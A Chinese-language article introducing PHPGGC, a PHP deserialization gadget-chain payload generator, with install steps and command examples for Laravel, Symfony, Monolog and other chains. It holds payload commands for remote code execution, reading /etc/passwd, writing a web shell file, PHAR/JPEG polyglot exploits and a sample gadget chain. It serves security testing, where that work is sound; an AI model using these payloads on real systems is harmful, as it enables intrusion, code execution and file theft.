当前位置：首页 > news >正文

PHPGGC：PHP反序列化漏洞测试的终极武器库

news 2026/5/26 15:32:26

PHPGGC：PHP反序列化漏洞测试的终极武器库

【免费下载链接】phpggcPHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically.项目地址: https://gitcode.com/gh_mirrors/ph/phpggc

在当今网络安全威胁日益严峻的时代，PHP应用程序的反序列化漏洞已成为攻击者最青睐的攻击向量之一。PHPGGC作为一款专业的PHP反序列化漏洞利用链生成工具，为安全研究人员和开发者提供了检测和防御此类漏洞的强大武器。本文将深入解析PHPGGC的核心功能、使用场景和实战应用，帮助你全面掌握这一安全测试利器。

为什么PHP反序列化漏洞如此危险？

PHP的unserialize()函数在设计上存在固有风险，它允许将序列化的字符串重新转换为PHP对象。当攻击者能够控制传递给unserialize()的数据时，就可能触发恶意代码执行、文件操作等严重安全漏洞。这种漏洞往往隐藏在看似无害的代码中，一旦被利用，后果不堪设想。

反序列化漏洞的典型场景

用户输入直接反序列化：将用户提交的数据直接传递给unserialize()函数
缓存数据反序列化：从缓存中读取并反序列化未经验证的数据
会话数据反序列化：处理用户会话数据时未进行充分验证
配置文件反序列化：反序列化来自不可信源的配置文件

PHPGGC：安全测试的瑞士军刀

PHPGGC是一个PHP反序列化payload库，集成了大量针对主流PHP框架和库的预构建利用链。它不仅是安全研究人员的利器，也是开发者进行代码审计和安全测试的重要工具。

核心功能特性

多框架支持：覆盖Laravel、Symfony、ThinkPHP、Yii、CodeIgniter等30+主流PHP框架
多样化攻击类型：支持RCE、文件操作、SQL注入、SSRF等多种漏洞类型
灵活的使用方式：支持命令行和编程接口两种使用模式
丰富的利用链库：包含数百个精心设计的利用链，持续更新维护

快速上手：从安装到实战

环境准备与安装

PHPGGC要求PHP 5.6或更高版本。安装过程极其简单：

git clone https://gitcode.com/gh_mirrors/ph/phpggc cd phpggc chmod +x phpggc

基础使用示例

首先查看所有可用的利用链：

./phpggc -l

这个命令会列出所有支持的框架、版本范围和漏洞类型。例如，要查看Laravel相关的利用链：

./phpggc -l laravel

生成第一个payload

假设我们需要测试Monolog框架的RCE漏洞：

./phpggc monolog/rce1 assert 'phpinfo()'

这将生成一个序列化的payload，可以直接用于安全测试。

项目架构深度解析

核心目录结构

gadgetchains/ # 所有利用链定义 ├── Laravel/ # Laravel框架利用链 │ ├── RCE/ # 远程代码执行类型 │ │ ├── 1/ # 第一个利用链版本 │ │ │ ├── chain.php # 利用链逻辑定义 │ │ │ └── gadgets.php # 使用的gadget定义 │ │ └── 2/ │ └── FD/ # 文件删除类型 ├── Symfony/ # Symfony框架利用链 └── lib/PHPGGC/ # 核心库文件

利用链的工作原理

每个利用链由两个核心文件组成：

chain.php：定义利用链的触发逻辑和参数处理
gadgets.php：包含具体的gadget类定义和依赖关系

实战应用场景

场景一：Web应用安全测试

假设你正在审计一个使用Laravel框架的Web应用，怀疑存在反序列化漏洞。使用PHPGGC可以快速生成测试payload：

# 生成Laravel RCE payload ./phpggc Laravel/RCE1 system 'id' # 如果需要URL编码 ./phpggc -u Laravel/RCE1 system 'id'

场景二：API接口安全评估

对于接收序列化数据的API接口，可以使用PHPGGC生成各种类型的payload进行模糊测试：

# 生成文件读取payload ./phpggc CodeIgniter4/FR1 /etc/passwd # 生成SQL注入payload ./phpggc Drupal/SQLI1 "' OR 1=1--"

场景三：自动化安全扫描

PHPGGC支持编程接口，可以集成到自动化安全扫描工具中：

<?php include("phpggc/lib/PHPGGC.php"); // 创建Guzzle RCE利用链实例 $gc = new \GadgetChain\Guzzle\RCE1(); // 设置参数 $parameters = $gc->process_parameters([ 'function' => 'system', 'parameter' => 'id', ]); // 生成payload $object = $gc->generate($parameters); $serialized = serialize($object); // 输出payload echo $serialized . "\n";

高级功能详解

PHAR文件生成

PHPGGC支持生成PHAR格式的payload，这在某些场景下特别有用：

# 生成PHAR格式的payload ./phpggc -p phar -o /tmp/exploit.phar monolog/rce1 system id # 生成ZIP格式的PHAR ./phpggc -p zip -o /tmp/exploit.zip.phar monolog/rce1 system id # 生成JPEG/PHAR混合文件（polyglot） ./phpggc -pj /tmp/dummy.jpg -o /tmp/exploit.jpg monolog/rce1 system id

编码器使用

PHPGGC提供多种编码器来处理payload：

# URL编码 ./phpggc -u monolog/rce1 system id # Base64编码 ./phpggc -b monolog/rce1 system id # 软URL编码（保持可读性） ./phpggc -s monolog/rce1 system id # 组合使用编码器 ./phpggc -b -u -u monolog/rce1 system id

增强选项

快速析构：使用-f参数确保对象在unserialize()后立即销毁
ASCII字符串：将非ASCII字符转换为十六进制表示
属性公开化：将受保护和私有属性转换为公共属性

漏洞类型详解

RCE（远程代码执行）

RCE是最危险的漏洞类型，PHPGGC支持三种不同的RCE执行方式：

执行类型	命令格式	示例
命令执行	`./phpggc <chain> <command>`	`./phpggc Symfony/RCE1 id`
PHP代码执行	`./phpggc <chain> '<php code>'`	`./phpggc Symfony/RCE2 'phpinfo();'`
函数调用	`./phpggc <chain> <function> <param>`	`./phpggc Symfony/RCE4 system id`

文件操作漏洞

漏洞类型	描述	示例
文件读取	读取服务器上的敏感文件	`./phpggc CodeIgniter4/FR1 /etc/passwd`
文件写入	写入文件到服务器	`./phpggc swiftmailer/fw1 /var/www/shell.php /tmp/data`
文件删除	删除服务器上的文件	`./phpggc Dompdf/FD1 /tmp/test.txt`

其他漏洞类型

SQL注入：通过反序列化触发SQL注入
SSRF：服务器端请求伪造
XXE：XML外部实体注入
信息泄露：获取敏感系统信息

安全测试最佳实践

测试环境搭建

在进行反序列化漏洞测试时，务必遵循以下原则：

隔离环境：在独立的测试环境中进行，避免影响生产系统
权限控制：使用最小必要权限运行测试
日志记录：详细记录测试过程和结果
风险评估：评估测试可能带来的风险

测试流程建议

常见问题排查

Payload不生效：检查目标框架版本是否匹配
编码问题：尝试不同的编码方式
字符限制：使用ASCII字符串或属性公开化选项
环境差异：在不同PHP版本下测试

进阶应用：自定义利用链开发

创建新的利用链

PHPGGC提供了便捷的工具来创建新的利用链：

./phpggc -n Drupal RCE

这个命令会在gadgetchains/Drupal/RCE/目录下创建新的利用链模��。

利用链开发规范

遵循命名规范：使用框架名/漏洞类型/版本号的命名方式
明确版本范围：精确指定利用链适用的版本范围
最小化payload：避免包含不必要的参数
充分测试：在多个版本和环境下测试

示例：简单的利用链结构

// gadgets.php namespace MyFramework\VulnerableClass; class VulnerableClass { private $callback; public function __destruct() { if (isset($this->callback)) { call_user_func($this->callback); } } } // chain.php class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall { public static $version = '1.0.0 <= 2.0.0+'; public static $vector = '__destruct'; public static $parameters = ['function', 'parameter']; public function generate(array $parameters) { $function = $parameters['function']; $parameter = $parameters['parameter']; $object = new \MyFramework\VulnerableClass\VulnerableClass(); $object->callback = [$function, $parameter]; return $object; } }

集成到CI/CD流程

自动化安全测试

将PHPGGC集成到CI/CD流程中，可以在每次代码提交时自动进行安全测试：

# .gitlab-ci.yml 示例 security_test: stage: test script: - git clone https://gitcode.com/gh_mirrors/ph/phpggc - cd phpggc - ./phpggc --test-payload Laravel/RCE1 - # 添加更多测试逻辑

测试脚本示例

#!/bin/bash # security_test.sh # 测试Laravel RCE利用链 echo "Testing Laravel RCE chains..." ./phpggc Laravel/RCE1 --test-payload ./phpggc Laravel/RCE2 --test-payload ./phpggc Laravel/RCE3 --test-payload # 测试Symfony RCE利用链 echo "Testing Symfony RCE chains..." ./phpggc Symfony/RCE1 --test-payload ./phpggc Symfony/RCE2 --test-payload # 生成测试报告 echo "Security test completed at $(date)" > security_report.txt

版本兼容性测试

PHPGGC提供了强大的版本兼容性测试工具：

# 测试Monolog包的所有版本 ./test-gc-compatibility.py monolog/monolog monolog/rce1 monolog/rce3 # 测试特定版本 ./test-gc-compatibility.py monolog/monolog:2.3.0,1.25.4 monolog/rce1 monolog/rce3

测试结果会以表格形式显示，清晰展示每个版本对各个利用链的兼容性。

容器化部署

PHPGGC支持Docker部署，方便在不同环境中使用：

# 构建Docker镜像 docker build . -t 'phpggc' # 运行测试 docker run phpggc Monolog/rce1 'system' 'id' # 测试利用链 docker run -v "$(pwd)":/app -w /app phpggc Monolog/RCE9 --test-payload